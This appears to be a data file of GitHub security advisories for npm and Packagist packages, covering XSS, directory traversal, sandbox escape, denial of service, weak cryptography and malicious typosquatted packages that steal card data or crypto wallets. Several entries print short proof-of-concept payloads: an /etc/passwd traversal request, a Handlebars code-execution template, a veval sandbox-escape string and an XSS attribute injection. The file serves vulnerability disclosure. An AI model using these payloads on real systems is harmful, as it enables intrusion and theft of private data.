+1.4.0,GHSA-5g6j-8hv4-vfgj,2020-08-31T18:43:22Z,2020-09-11T21:21:19Z,,[],Cross-Site Scripting in node-red,"Versions of `node-red` prior to 0.18.6 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize the `name` field in new items, allowing attackers to execute arbitrary JavaScript in the victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 0.18.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'node-red'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.6'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/349146'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/993'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-chh2-rvhg-wqwr,2020-08-31T18:50:40Z,2020-09-03T21:02:10Z,,[],Malicious Package in json-serializer,"Version 2.0.10 of `json-serializer` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.",[],"[{'package': {'ecosystem': 'npm', 'name': 'json-serializer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.10'}, {'fixed': '2.0.11'}]}], 'versions': ['2.0.10']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1194'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-95cg-3r4g-7w6j,2021-09-30T17:10:32Z,2020-09-03T23:01:29Z,,[],Malicious Package in js-rha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-rha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1283'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q48g-p5cx-c7c7,2023-09-11T20:33:58Z,2020-09-01T17:36:42Z,,['CVE-2017-16221'],Directory Traversal in yzt,"Affected versions of `yzt` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'yzt'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16221'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yzt'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/416'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x44x-r84w-8v67,2021-10-04T21:15:52Z,2020-09-09T18:45:55Z,,['CVE-2020-24660'],Lack of URL normalization may lead to authorization bypass when URL access rules are used,"### Impact
+When access rules are used inside a protected host, some URL encodings may bypass filtering system.
+
+### Patches
+Version 0.5.2 includes a patch that fixes the vulnerability
+
+### Workarounds
+No way for users to fix or remediate the vulnerability without upgrading
+
+### References
+https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2290
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [this repository](https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/issues) or [LemonLDAP::NG GitLab](https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues)
+* Email us at [lemonldap-ng-users@ow2.org](mailto:lemonldap-ng-users@ow2.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'lemonldap-ng-handler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/security/advisories/GHSA-x44x-r84w-8v67'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24660'}, {'type': 'WEB', 'url': 'https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/commit/136aa83ed431462fa42ce17b7f9b24e056de06be'}, {'type': 'PACKAGE', 'url': 'https://github.com/LemonLDAPNG/node-lemonldap-ng-handler'}, {'type': 'WEB', 'url': 'https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/releases/tag/0.5.2'}, {'type': 'WEB', 'url': 'https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2290'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODELEMONLDAPNGHANDLER-655999'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4762'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/lemonldap-ng-handler'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-09T18:42:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f7wm-x4gw-6m23,2023-09-20T19:10:45Z,2020-09-24T16:23:54Z,,['CVE-2020-25768'],Contao Insert tag injection in forms,"### Impact
+
+It is possible to inject insert tags in frontend forms which will be replaced when the page is rendered.
+
+### Patches
+
+Update to Contao 4.4.52, 4.9.6 or 4.10.1.
+
+### Workarounds
+
+Disable the front end login form and do not use form fields with array keys such as `fieldname[]`.
+
+### References
+
+https://contao.org/en/security-advisories/insert-tag-injection-in-forms
+
+### For more information
+
+If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.52'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.9.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.10.0'}, {'fixed': '4.10.1'}]}], 'versions': ['4.10.0']}]","[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-f7wm-x4gw-6m23'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25768'}, {'type': 'WEB', 'url': 'https://community.contao.org/en/forumdisplay.php?4-Announcements'}, {'type': 'WEB', 'url': 'https://contao.org/en/security-advisories/insert-tag-injection-in-forms.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]","{'cwe_ids': ['CWE-20', 'CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-24T16:23:42Z', 'nvd_published_at': '2020-10-07T21:15:00Z'}"
+1.4.0,GHSA-28f8-hqmc-7ph8,2023-07-27T00:06:44Z,2020-09-11T21:19:09Z,,[],Malicious Package in ember-power-timepicker,"Version 1.0.8 of `ember-power-timepicker` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.7",[],"[{'package': {'ecosystem': 'npm', 'name': 'ember-power-timepicker'}, 'versions': ['1.0.8']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/931'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5c6f-jpx7-cwq6,2023-09-12T21:24:15Z,2020-09-01T18:13:11Z,,['CVE-2017-16209'],Directory Traversal in enserver,"Affected versions of `enserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'enserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16209'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/enserver'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/425'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-29fh-xcjr-p7rx,2021-10-04T19:10:02Z,2020-09-03T17:02:22Z,,[],Malicious Package in web3-eht,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'web3-eht'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1416'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pv6r-vchh-cxg9,2020-08-31T18:50:15Z,2020-09-03T20:42:09Z,,[],Denial of Service in apostrophe,"Versions of `apostrophe` prior to 2.97.1 are vulnerable to Denial of Service. The `apostrophe-jobs` module sets a callback for incoming jobs and doesn't clear it regardless of its status. This causes the server to accumulate callbacks, allowing an attacker to start a large number of jobs and exhaust system memory.
+
+
+## Recommendation
+
+Upgrade to version 2.97.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'apostrophe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.97.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1183'}]","{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j6x7-42x2-hpcf,2021-09-29T21:15:09Z,2020-09-03T22:14:20Z,,[],Malicious Package in buffer-xoz,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xoz'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1253'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2cf5-4w76-r9qv,2020-08-31T18:54:52Z,2020-09-04T14:57:38Z,,[],Arbitrary Code Execution in handlebars,"Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).
+
+The following template can be used to demonstrate the vulnerability:
+```{{#with ""constructor""}}
+ {{#with split as |a|}}
+ {{pop (push ""alert('Vulnerable Handlebars JS');"")}}
+ {{#with (concat (lookup join (slice 0 1)))}}
+ {{#each (slice 2 3)}}
+ {{#with (apply 0 a)}}
+ {{.}}
+ {{/with}}
+ {{/each}}
+ {{/with}}
+ {{/with}}
+{{/with}}```
+
+
+## Recommendation
+
+Upgrade to version 3.0.8, 4.5.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1316'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5645-gc7h-98h8,2023-07-27T20:13:07Z,2020-09-01T20:32:07Z,,[],Malicious Package in react-dates-sc,"Version 0.3.0 of `react-dates-sc` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.3.0 of this module is found installed you will want to replace it with a version before or after 0.3.0. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.3.0-beta.83",[],"[{'package': {'ecosystem': 'npm', 'name': 'react-dates-sc'}, 'versions': ['0.3.0']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/634'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5v7r-jg9r-vq44,2021-09-29T20:08:01Z,2020-09-03T21:19:46Z,,[],Insecure Cryptography Algorithm in simple-crypto-js,"Versions of `simple-crypto-js` prior to 2.3.0 use AES-CBC with PKCS#7 padding, which is vulnerable to padding oracle attacks. This may allow attackers to break the encryption and access sensitive data.
+
+
+## Recommendation
+
+Upgrade to version 2.3.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'simple-crypto-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/danang-id/simple-crypto-js/issues/12'}, {'type': 'WEB', 'url': 'https://github.com/danang-id/simple-crypto-js/pull/17'}, {'type': 'WEB', 'url': 'https://github.com/danang-id/simple-crypto-js/commit/416584369de1dad9b21ac3fe85df0b71cf5718b2'}, {'type': 'PACKAGE', 'url': 'https://github.com/danang-id/simple-crypto-js'}, {'type': 'WEB', 'url': 'https://robertheaton.com/2013/07/29/padding-oracle-attack/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SIMPLECRYPTOJS-544027'}]","{'cwe_ids': ['CWE-327'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9w87-4j72-gcv7,2020-08-31T18:37:32Z,2020-09-02T18:27:54Z,,[],Insecure Default Configuration in graphql-code-generator,"Versions of `graphql-code-generator` prior to 0.18.2 have an Insecure Default Configuration. The packages sets `NODE_TLS_REJECT_UNAUTHORIZED` to 0, disabling certificate verification for the entire project. This results in Insecure Communication for the process.
+
+
+## Recommendation
+
+Upgrade to version 0.18.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'graphql-code-generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dotansimha/graphql-code-generator/issues/1806'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/834'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g4m3-rpxr-h7vg,2021-09-30T20:26:34Z,2020-09-03T19:52:25Z,,[],Malicious Package in mogodb-core,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mogodb-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1134'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-73c6-vwjh-g3qh,2021-10-01T21:00:05Z,2020-09-03T19:40:46Z,,[],Malicious Package in crpyto-js,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'crpyto-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1390'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rggq-f2wf-m6cp,2021-10-01T13:44:23Z,2020-09-02T18:31:08Z,,[],Malicious Package in jajajejejiji,"All versions of `jajajejejiji` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jajajejejiji'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/838'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-54qm-37qr-w5wq,2020-08-31T18:55:05Z,2020-09-04T15:04:20Z,,[],Sandbox Breakout / Arbitrary Code Execution in veval,"All versions of `veval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'veval'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1321'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4m3p-x2hp-2pgx,2021-10-01T20:44:10Z,2020-09-04T16:45:23Z,,[],Malicious Package in bitcroe-lib,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcroe-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1371'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v9wp-8r97-v6xg,2020-08-31T18:44:56Z,2020-09-03T17:17:00Z,,[],Cross-Site Scripting in jquery.json-viewer,"Versions of `jquery.json-viewer` prior to 1.3.0 are vulnerable to Cross-Site Scripting (XSS). The package insufficiently sanitizes user input when creating links, and concatenates the user input in an `` tag. This allows attackers to create malicious links with JSON payloads such as:
+```
+{
+ ""foo"": ""https://bar.com\"" onmouseover=alert('xss') \""""
+}
+```
+
+This may lead to arbitrary JavaScript execution in a victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 1.3.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'jquery.json-viewer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1036'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vjvw-wcmw-pr26,2020-08-31T19:00:10Z,2020-09-04T17:37:08Z,,[],Insufficient Entropy in parsel,"All versions of `parsel` use an insecure key derivation function. The package runs keys of arbitrary lengths through one round of SHA256 hashing for key stretching. This allows for the use of keys of insufficient entropy with inappropriate key stretching.
+
+
+## Recommendation
+
+The package is deprecated and will not be updated. Consider using an alternative package.",[],"[{'package': {'ecosystem': 'npm', 'name': 'parsel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1462'}]","{'cwe_ids': ['CWE-331'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4xgp-xrg3-c73w,2021-09-30T22:02:56Z,2020-09-11T21:10:29Z,,[],Malicious Package in commqnder,"All versions of `commqnder` contain malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.
+
+
+## Recommendation
+
+Remove the package from your environment and verify whether your system is running the cryptocurrency miner.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'commqnder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/924'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v99v-xgjx-7m7g,2021-10-01T14:00:55Z,2020-09-02T18:40:47Z,,[],Malicious Package in asnyc,"All versions of `asnyc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asnyc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/847'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6xm4-p6r2-mwrc,2021-09-30T16:14:12Z,2020-09-03T22:47:30Z,,[],Malicious Package in cuffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cuffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1270'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:12Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pm44-7gw9-6g8p,2023-09-12T19:32:31Z,2020-09-01T18:28:08Z,,['CVE-2017-16185'],Directory Traversal in uekw1511server,"Affected versions of `uekw1511server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'uekw1511server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16185'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/uekw1511server'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/450'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mg85-8mv5-ffjr,2020-08-31T19:00:33Z,2020-09-03T15:45:40Z,,[],Denial of Service in ammo,"All versions of `ammo` are vulnerable to Denial of Service. The Range HTTP header parser has a vulnerability which will cause the function to throw a system error if the header is set to an invalid value. Because hapi is not expecting the function to ever throw, the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+This package is deprecated and is now maintained as `@hapi/ammo`. Please update your dependencies to use `@hapi/ammo`. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'ammo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1472'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:33Z', 'nvd_published_at': None}"
